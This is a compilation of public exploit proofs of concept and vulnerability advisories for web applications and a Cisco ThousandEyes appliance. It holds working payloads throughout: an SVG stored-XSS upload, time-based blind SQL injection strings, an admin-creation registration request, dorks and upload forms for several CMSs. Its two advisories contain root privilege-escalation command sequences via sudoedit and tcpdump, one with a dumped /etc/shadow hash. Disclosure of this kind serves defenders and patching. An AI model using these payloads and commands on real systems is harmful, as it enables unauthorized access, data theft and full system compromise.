<pre><code># Exploit Title: Academy LMS 6.1 - Arbitrary File Upload<br /># Exploit Author: CraCkEr<br /># Date: 05/08/2023<br /># Vendor: Creativeitem<br /># Vendor Homepage: https://academylms.net/<br /># Software Link: https://demo.academylms.net/<br /># Tested on: Windows 10 Pro<br /># Impact: Allows User to upload files to the web server<br /># CWE: CWE-79 - CWE-74 - CWE-707<br /><br /><br />## Description<br /><br />Allows Attacker to upload malicious files onto the server, such as Stored XSS<br /><br /><br />## Steps to Reproduce:<br /><br />1. Login as a [Normal User]<br />2. In [User Dashboard], go to [Profile Settings] on this Path: https://website/dashboard/#/settings<br />3. Upload any Image into the [avatar]<br />4. Capture the POST Request with [Burp Proxy Intercept]<br />5. Edit the file extension to .svg & inject your [Evil-Code] or [Stored XSS]<br /> <br />-----------------------------------------------------------<br />POST /wp-admin/async-upload.php HTTP/2<br /><br />-----------------------------------------------------------<br />Content-Disposition: form-data; name="async-upload"; filename="ahacka.svg"<br />Content-Type: image/svg+xml<br /><br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><br /> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><br /> <script type="text/javascript"><br /> alert("XSS by CraCkEr");<br /> </script><br /></svg><br />-----------------------------------------------------------<br /><br />6. Send the Request<br />7. Capture the GET request from [Burp Logger] to get the Path of your Uploaded [Stored-XSS]<br />8. Access your Uploded Evil file on this Path: https://website/wp-content/uploads/***/**/*****.svg<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: Credit Lite 1.5.4 - SQL Injection<br /># Exploit Author: CraCkEr<br /># Date: 31/07/2023<br /># Vendor: Hobby-Tech<br /># Vendor Homepage: https://codecanyon.net/item/credit-lite-micro-credit-solutions/39554392<br /># Software Link: https://credit-lite.appshat.xyz/<br /># Tested on: Windows 10 Pro<br /># Impact: Database Access<br /># CVE: CVE-2023-4407<br /># CWE: CWE-89 - CWE-74 - CWE-707<br /><br /><br />## Description<br /><br />SQL injection attacks can allow unauthorized access to sensitive data, modification of<br />data and crash the application or make it unavailable, leading to lost revenue and<br />damage to a company's reputation.<br /><br /><br /><br />## Steps to Reproduce:<br /><br />To Catch the POST Request<br /><br />1. Visit [Account Statement] on this Path: https://website/portal/reports/account_statement<br /><br />2. Select [Start Date] + [End Date] + [Account Number] and Click on [Filter]<br /><br /><br /><br />Path: /portal/reports/account_statement<br /><br />POST parameter 'date1' is vulnerable to SQL Injection<br />POST parameter 'date2' is vulnerable to SQL Injection<br /><br />-------------------------------------------------------------------------<br />POST /portal/reports/account_statement HTTP/2<br /><br />_token=5k2IfXrQ8aueUQzrd5UfilSZzgOC5vyCPGxTTZDK&date1=[SQLi]&date2=[SQLi]&account_number=20005001<br />-------------------------------------------------------------------------<br /><br />---<br />Parameter: date1 (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: _token=5k2IfXrQ8aueUQzrd5UfilSZzgOC5vyCPGxTTZDK&date1=2023-07-31'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z&date2=2023-07-31&account_number=20005001<br /><br />Parameter: date2 (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: _token=5k2IfXrQ8aueUQzrd5UfilSZzgOC5vyCPGxTTZDK&date1=2023-07-31&date2=2023-07-31'XOR(SELECT(0)FROM(SELECT(SLEEP(9)))a)XOR'Z&account_number=20005001<br />---<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: Crypto Currency Tracker (CCT) - Admin Account Creation (Unauthenticated)<br /># Date: 11.08.2023<br /># Exploit Author: 0xBr<br /># Software Link: https://codecanyon.net/item/crypto-currency-tracker-prices-charts-news-icos-info-and-more/21588008<br /># Version: <=9.5<br /># CVE: CVE-2023-37759<br /><br />POST /en/user/register HTTP/2<br />Host: localhost<br />Cookie: XSRF-TOKEN=[TOKEN]; laravel_session=[LARAVEL_SESSION]; SELECTED_CURRENCY=USD; SELECTED_CURRENCY_PRICE=1; cookieconsent_status=dismiss<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-GB,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 756<br /><br />_token=[_TOKEN]&name=testing&role_id=1&email=testing%40testing.testing&password=testing&g-recaptcha-response=[G-RECAPTCHA-RESPONSE]&submit_register=Register<br /><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Fara Melk Estate CMS v1.5.0 unauthorized administrative access Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) |<br />| # Vendor : http://www.20script.ir/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] unauthorized administrative access. allows users to access the administrative interface.<br /><br />[+] Use Payload : /admin-assets/tables.html#<br /><br />[+] http://127.0.0.1/fara/admin-assets/tables.html#<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : evsanati radyo v1.0 Remote File Upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) |<br />| # Vendor : https://donanimplus.com/b/evsanati-v1-0-radyo-scripti |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine <br /><br />[+] infected file : /upload/yukle.php<br /><br />[+] Unauthorized administrator access. Allows any visitor to upload malicious files and run them<br /><br />[+] Some web sites have deleted the upload file so use this code ( note : use after login )<br /><br />[+] line 5 set your target<br /><br /><head><br /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br /></head><br /><br /><form action="http://1270.0.0.1/gazipasayalcinemlakcom/upload/yukle.php" method="post" enctype="multipart/form-data"><br /><br /><br /><div align="center"><br /><br /><br /><table border="0" cellspacing="0" cellpadding="0"><br /> <tr><br /> <td><b>Resmi Secin :</b></td><br /> <td>&nbsp;<input type="file" name="dosya" size="20"></td><br /> </tr><br /> <tr><br /> <td></td><br /> <td><br /><input type="submit" value="Yukle" style="width:220px;"></td><br /> </tr><br /></table><br /><br /><br /></div><br /><br /></form><br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Event Locations CMS V1.0.1 - unrestricted files upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) | <br />| # Vendor : https://codecanyon.net/item/event-locations-phpmysql-plugin/22100679 | <br />| # Dork : "/events_edit.php?id=" |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Allows any visitor to upload malicious files and run them<br /><br />[+] click 2 creat a Nouveau RDV & in Upload Image box upload your Ev!l .<br /><br />[+] go to http://127.0.0.1/cutgg/assets/uploads/ <br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : DoorGets CMS v7.0 Sensitive information disclosure Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit) | <br />| # Vendor : https://sourceforge.net/projects/doorgets-cms/files/latest/download?source=directory | <br />| # Dork : "Powered with doorGets ™" |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Payload gives you the username and password for the site script manager.<br /><br />[+] The problem is caused when the installation folder is not deleted by the user .<br /><br />[+] In this case the developer made a mistake .<br /><br /> So that after installation, the script does not delete the installation file or notify the user of changing the folder path or deleting it. <br /><br /> It also stores the manager's information in temporary files that any visitor can scan and can use this information to the script control panel.<br /><br />[+] Use Payload : setup/temp/admin.php<br /><br />[+] it show you login information for admin access .<br /><br />[+] http://127.0.0.1/watsingschoolacth/v12/setup/temp/admin.php<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Emaar – Real Estate Agency Directory System v5.7 Unrestricted File Upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit) | <br />| # Vendor : https://codecanyon.net/item/emaar-real-estate-agency-directory-system/23200024?s_rank=92 | <br />| # Dork : "© 2019 Emaar. All Rights Reserved." |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Creat new user & login .<br /><br />[+] Go to http://127.0.0.1/theme.meteros.agency/Emaar/Users/Emaar%20company/edit .<br /><br />[+] upload your Ev!l .<br /><br />[+] Uploaded malicious files can be run remotely<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>KL-001-2023-003: Cisco ThousandEyes Enterprise Agent Virtual Appliance Arbitrary File Modification via sudoedit<br /><br />Title: Cisco ThousandEyes Enterprise Agent Virtual Appliance Arbitrary File Modification via sudoedit<br />Advisory ID: KL-001-2023-003<br />Publication Date: 2023.08.17<br />Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2023-003.txt<br /><br /><br />1. Vulnerability Details<br /><br /> Affected Vendor: ThousandEyes<br /> Affected Product: ThousandEyes Enterprise Agent Virtual Appliance<br /> Affected Version: thousandeyes-va-64-18.04 0.218<br /> Platform: Linux / Ubuntu 18.04<br /> CWE Classification: CWE-1395: Dependency on Vulnerable<br /> Third-Party Component<br /> CVE ID: CVE-2023-22809<br /><br /><br />2. Vulnerability Description<br /><br /> An unpatched vulnerability in 'sudoedit', allowed by sudo<br /> configuration, permits a low-privilege user to modify arbitrary<br /> files as root and subsequently execute arbitrary commands as<br /> root.<br /><br /><br />3. Technical Description<br /><br /> The ThousandEyes Virtual Appliance is distributed with<br /> a restrictive set of commands that can be executed via<br /> sudo, without having to provide the password for the<br /> 'thousandeyes' account. However, the ability to execute<br /> sudoedit of a specific file (/etc/hosts) via sudo is permitted<br /> without requiring the password. The sudoedit binary can<br /> be abused to allow the modification of any file on the<br /> filesystem. This is a known security vulnerability (per<br /> https://seclists.org/oss-sec/2023/q1/42), but had not been<br /> disclosed for the ThousandEyes Virtual Appliance. This can be<br /> abused to allow root-level compromise of the virtual appliance.<br /><br /> thousandeyes@thousandeyes-va:~$ id<br /> uid=1000(thousandeyes) gid=1000(thousandeyes) <br />groups=1000(thousandeyes),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),109(sambashare)<br /> thousandeyes@thousandeyes-va:~$ sudo -l<br /> Matching Defaults entries for thousandeyes on thousandeyes-va:<br /> env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin<br /><br /> User thousandeyes may run the following commands on thousandeyes-va:<br /> (ALL : ALL) ALL<br /> (ALL) NOPASSWD: /bin/systemctl start te-va, /bin/systemctl stop te-va, /bin/systemctl restart te-va, <br />/bin/systemctl status te-va, /bin/systemctl start te-agent, /bin/systemctl stop<br /> te-agent, /bin/systemctl restart te-agent, /bin/systemctl status te-agent, /bin/systemctl start <br />te-browserbot, /bin/systemctl stop te-browserbot, /bin/systemctl restart<br /> te-browserbot, /bin/systemctl status te-browserbot, /sbin/reboot, sudoedit /etc/hosts, /usr/bin/dig, <br />/usr/bin/lsof, /usr/bin/apt-get update, /usr/bin/apt-get install te-agent,<br /> /usr/bin/apt-get install te-browserbot, /usr/bin/apt-get install te-va, /usr/bin/apt-get install te-pa, <br />/usr/bin/apt-get install te-va-unlock, /usr/bin/apt-get install<br /> te-intl-fonts, /usr/bin/apt-get install te-agent-utils, /usr/bin/apt-get install ntpdate, <br />/usr/bin/apt-cache, /usr/bin/te-*, /usr/local/bin/te-*, /usr/local/sbin/te-*<br /> (root) NOPASSWD: /usr/sbin/ntpdate, /usr/sbin/traceroute, /usr/sbin/tcpdump<br /><br /> Here we see that /usr/local/bin/te-* are executable as root with no<br /> password. Even though sudoedit is only permitted to edit /etc/hosts,<br /> we can use EDITOR= to spawn vim to edit an arbitrary file. Pick one<br /> of those scripts because we can then execute it:<br /><br /> thousandeyes@thousandeyes-va:~$ file /usr/local/bin/te-set-config<br /> /usr/local/bin/te-set-config: Python script, ASCII text executable<br /> thousandeyes@thousandeyes-va:~$ EDITOR='vim -- /usr/local/bin/te-set-config' sudoedit /etc/hosts<br /> sudoedit: --: editing files in a writable directory is not permitted<br /> 2 files to edit<br /> sudoedit: /etc/hosts unchanged<br /> thousandeyes@thousandeyes-va:~$ file /usr/local/bin/te-set-config<br /> /usr/local/bin/te-set-config: ASCII text<br /> thousandeyes@thousandeyes-va:~$ cat /usr/local/bin/te-set-config<br /> /bin/bash<br /> thousandeyes@thousandeyes-va:~$ sudo /usr/local/bin/te-set-config<br /> root@thousandeyes-va:~# id<br /> uid=0(root) gid=0(root) groups=0(root)<br /> root@thousandeyes-va:~#<br /><br /><br />4. Mitigation and Remediation Recommendation<br /><br /> The vendor has released a version which remediates the described<br /> vulnerability. Release notes are available at:<br /><br /> https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwf18994<br /><br /><br />5. Credit<br /><br /> This vulnerability was discovered by Jim Becher of<br /> KoreLogic, Inc.<br /><br /><br />6. Disclosure Timeline<br /><br /> 2023.04.26 - KoreLogic submits vulnerability details to Cisco.<br /> 2023.04.26 - Cisco acknowledges receipt and the intention to<br /> investigate.<br /> 2023.05.04 - Cisco notifies KoreLogic that a remediation for this<br /> vulnerability is expected to be available within<br /> 90 days.<br /> 2023.06.30 - 45 business days have elapsed since KoreLogic reported<br /> this vulnerability to the vendor.<br /> 2023.07.11 - Cisco informs KoreLogic that the issue has been<br /> remediated in the latest ThousandEyes Virtual<br /> Appliance and a Third Party Software Release Note<br /> Enclosure will be released 2023.08.16. Cisco<br /> provides CVE-2023-22809 to track this vulnerability.<br /> 2023.07.24 - 60 business days have elapsed since KoreLogic reported<br /> this vulnerability to the vendor.<br /> 2023.08.16 - Cisco public acknowledgement.<br /> 2023.08.17 - KoreLogic public disclosure.<br /><br /><br />7. Proof of Concept<br /><br /> See 3. Technical Description.<br /><br /><br />The contents of this advisory are copyright(c) 2023<br />KoreLogic, Inc. and are licensed under a Creative Commons<br />Attribution Share-Alike 4.0 (United States) License:<br />http://creativecommons.org/licenses/by-sa/4.0/<br /><br />KoreLogic, Inc. is a founder-owned and operated company with a<br />proven track record of providing security services to entities<br />ranging from Fortune 500 to small and mid-sized companies. We<br />are a highly skilled team of senior security consultants doing<br />by-hand security assessments for the most important networks in<br />the U.S. and around the world. We are also developers of various<br />tools and resources aimed at helping the security community.<br />https://www.korelogic.com/about-korelogic.html<br /><br />Our public vulnerability disclosure policy is available at:<br />https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt<br /><br /></code></pre>
<pre><code>KL-001-2023-002: Cisco ThousandEyes Enterprise Agent Virtual Appliance Privilege Escalation via tcpdump<br /><br />Title: Cisco ThousandEyes Enterprise Agent Virtual Appliance Privilege Escalation via tcpdump<br />Advisory ID: KL-001-2023-002<br />Publication Date: 2023.08.17<br />Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2023-002.txt<br /><br /><br />1. Vulnerability Details<br /><br /> Affected Vendor: ThousandEyes<br /> Affected Product: ThousandEyes Enterprise Agent Virtual Appliance<br /> Affected Version: thousandeyes-va-64-18.04 0.218<br /> Platform: Linux / Ubuntu 18.04<br /> CWE Classification: CWE-1395: Dependency on Vulnerable<br /> Third-Party Component<br /> CVE ID: CVE-2023-20224<br /><br /><br />2. Vulnerability Description<br /><br /> An insecure sudo configuration permits a low-privilege user<br /> to run arbitrary commands as root via the 'tcpdump' command<br /> without a password.<br /><br /><br />3. Technical Description<br /><br /> The ThousandEyes Virtual Appliance is distributed with a<br /> restrictive set of commands that can be executed via sudo,<br /> without having to provide the password for the 'thousandeyes'<br /> account. However, the ability to execute tcpdump via sudo is<br /> permitted without requiring the password. The post-rotate<br /> functionality of tcpdump can be used to execute arbitrary<br /> commands on the virtual appliance, allowing a privilege<br /> escalation to root. This is a known privilege escalation<br /> path, but had not been disclosed for the ThousandEyes Virtual<br /> Appliance.<br /><br /> $ ssh -c aes256-ctr -p 22 -i 1000eyes-id_rsa thousandeyes@1.3.3.7<br /> Welcome to ThousandEyes!<br /> Last login: Tue Jan 3 20:16:37 2023 from 1.3.3.8<br /> thousandeyes@thousandeyes-va:~$ id<br /> uid=1000(thousandeyes) gid=1000(thousandeyes) <br />groups=1000(thousandeyes),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),109(sambashare)<br /> thousandeyes@thousandeyes-va:~$ sudo -l<br /> Matching Defaults entries for thousandeyes on thousandeyes-va:<br /> env_reset, mail_badpass, <br />secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin<br /><br /> User thousandeyes may run the following commands on thousandeyes-va:<br /> (ALL : ALL) ALL<br /> (ALL) NOPASSWD: /bin/systemctl start te-va, /bin/systemctl stop te-va, /bin/systemctl restart te-va, <br />/bin/systemctl status te-va, /bin/systemctl start te-agent, /bin/systemctl stop<br /> te-agent, /bin/systemctl restart te-agent, /bin/systemctl status te-agent, /bin/systemctl start <br />te-browserbot, /bin/systemctl stop te-browserbot, /bin/systemctl restart<br /> te-browserbot, /bin/systemctl status te-browserbot, /sbin/reboot, sudoedit /etc/hosts, /usr/bin/dig, <br />/usr/bin/lsof, /usr/bin/apt-get update, /usr/bin/apt-get install te-agent,<br /> /usr/bin/apt-get install te-browserbot, /usr/bin/apt-get install te-va, /usr/bin/apt-get install te-pa, <br />/usr/bin/apt-get install te-va-unlock, /usr/bin/apt-get install<br /> te-intl-fonts, /usr/bin/apt-get install te-agent-utils, /usr/bin/apt-get install ntpdate, <br />/usr/bin/apt-cache, /usr/bin/te-*, /usr/local/bin/te-*, /usr/local/sbin/te-*<br /> (root) NOPASSWD: /usr/sbin/ntpdate, /usr/sbin/traceroute, /usr/sbin/tcpdump<br /><br /> Here we see that tcpdump is available as root with no password,<br /> and no restrictions on the arguments it can be passed.<br /><br /> Prepare a malicious script, then have tcpdump execute it as a<br /> postrotate command. Note, this needs to be more than simply<br /> a setuid copy of bash as it will drop privs if UID!=EUID, but<br /> python will not.<br /><br /> thousandeyes@thousandeyes-va:~$ cat /tmp/x4<br /> COMMAND='cp /usr/bin/python3.6 /python3.6; chmod u+s /python3.6'<br /> TF=$(mktemp)<br /> echo "$COMMAND" > $TF<br /> chmod +x $TF<br /> sudo /usr/sbin/tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root<br /><br /> thousandeyes@thousandeyes-va:~$ cat /tmp/runme4<br /> /python3.6 -c 'import os; os.setuid(0); os.system("/bin/sh")'<br /><br /> thousandeyes@thousandeyes-va:~$ /tmp/x4<br /> dropped privs to root<br /> tcpdump: listening on lo, link-type EN10MB (Ethernet), capture size 262144 bytes<br /><br /> In another ssh session as the 'thousandeyes' user, execute<br /> 'ping -c 1 127.0.0.1' to trigger tcpdump rotation:<br /><br /> Maximum file limit reached: 1<br /> 1 packet captured<br /> 4 packets received by filter<br /> 0 packets dropped by kernel<br /><br /> Execute the setuid python which then launches a shell:<br /><br /> thousandeyes@thousandeyes-va:/tmp$ /tmp/runme4<br /> # id<br /> uid=0(root) gid=1000(thousandeyes) <br />groups=1000(thousandeyes),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),109(sambashare)<br /><br /> # bash<br /> root@thousandeyes-va:~# id<br /> uid=0(root) gid=1000(thousandeyes) <br />groups=1000(thousandeyes),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),109(sambashare)<br /><br /> root@thousandeyes-va:~# cat /etc/shadow<br /> root:!:19145:0:99999:7:::<br /> daemon:!*:18885:0:99999:7:::<br /> bin:!*:18885:0:99999:7:::<br /> sys:!*:18885:0:99999:7:::<br /> sync:!*:18885:0:99999:7:::<br /> games:!*:18885:0:99999:7:::<br /> man:!*:18885:0:99999:7:::<br /> lp:!*:18885:0:99999:7:::<br /> mail:!*:18885:0:99999:7:::<br /> news:!*:18885:0:99999:7:::<br /> uucp:!*:18885:0:99999:7:::<br /> proxy:!*:18885:0:99999:7:::<br /> www-data:!*:18885:0:99999:7:::<br /> backup:!*:18885:0:99999:7:::<br /> list:!*:18885:0:99999:7:::<br /> irc:!*:18885:0:99999:7:::<br /> gnats:!*:18885:0:99999:7:::<br /> nobody:*:18885:0:99999:7:::<br /> systemd-network:!*:18885:0:99999:7:::<br /> systemd-resolve:!*:18885:0:99999:7:::<br /> syslog:!*:18885:0:99999:7:::<br /> messagebus:!*:18885:0:99999:7:::<br /> _apt:!*:18885:0:99999:7:::<br />thousandeyes:$6$qvB7Zfsh1fFCuBM9$l3X3Gj/7v.IY54N5YMFj5hpd.FbYOfqFPRcNxcOslO3M1MFfxcnUk1MNqtivetWIOTIfv.Z3ELQh5PPTUc2YL0:19146:7:364:30:::<br /> rdnssd:!*:19146:7:99999:30:::<br /> browserbot:!:19146::::::<br /> cntlm:!*:19146:7:99999:30:::<br /> sshd:!*:19146:7:99999:30:::<br /> root@thousandeyes-va:~#<br /><br /><br />4. Mitigation and Remediation Recommendation<br /><br /> The vendor has released a version which remediates the described<br /> vulnerability. Release notes are available at:<br /><br />https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-thoueye-privesc-NVhHGwb3<br /><br /><br />5. Credit<br /><br /> This vulnerability was discovered by Jim Becher of<br /> KoreLogic, Inc.<br /><br /><br />6. Disclosure Timeline<br /><br /> 2023.04.26 - KoreLogic submits vulnerability details to Cisco.<br /> 2023.04.26 - Cisco acknowledges receipt and the intention to<br /> investigate.<br /> 2023.05.04 - Cisco notifies KoreLogic that a remediation for this<br /> vulnerability is expected to be available within<br /> 90 days.<br /> 2023.06.30 - 45 business days have elapsed since KoreLogic reported<br /> this vulnerability to the vendor.<br /> 2023.07.11 - Cisco informs KoreLogic that the issue has been<br /> remediated in the latest ThousandEyes Virtual<br /> Appliance and a public advisory will be released<br /> 2023.08.16.<br /> 2023.07.24 - 60 business days have elapsed since KoreLogic reported<br /> this vulnerability to the vendor.<br /> 2023.08.09 - Cisco provides KoreLogic with CVE-2023-20224 to<br /> track this vulnerability.<br /> 2023.08.16 - Cisco public acknowledgement.<br /> 2023.08.17 - KoreLogic public disclosure.<br /><br /><br />7. Proof of Concept<br /><br /> See 3. Technical Description.<br /><br /><br />The contents of this advisory are copyright(c) 2023<br />KoreLogic, Inc. and are licensed under a Creative Commons<br />Attribution Share-Alike 4.0 (United States) License:<br />http://creativecommons.org/licenses/by-sa/4.0/<br /><br />KoreLogic, Inc. is a founder-owned and operated company with a<br />proven track record of providing security services to entities<br />ranging from Fortune 500 to small and mid-sized companies. We<br />are a highly skilled team of senior security consultants doing<br />by-hand security assessments for the most important networks in<br />the U.S. and around the world. We are also developers of various<br />tools and resources aimed at helping the security community.<br />https://www.korelogic.com/about-korelogic.html<br /><br />Our public vulnerability disclosure policy is available at:<br />https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt<br /><br /></code></pre>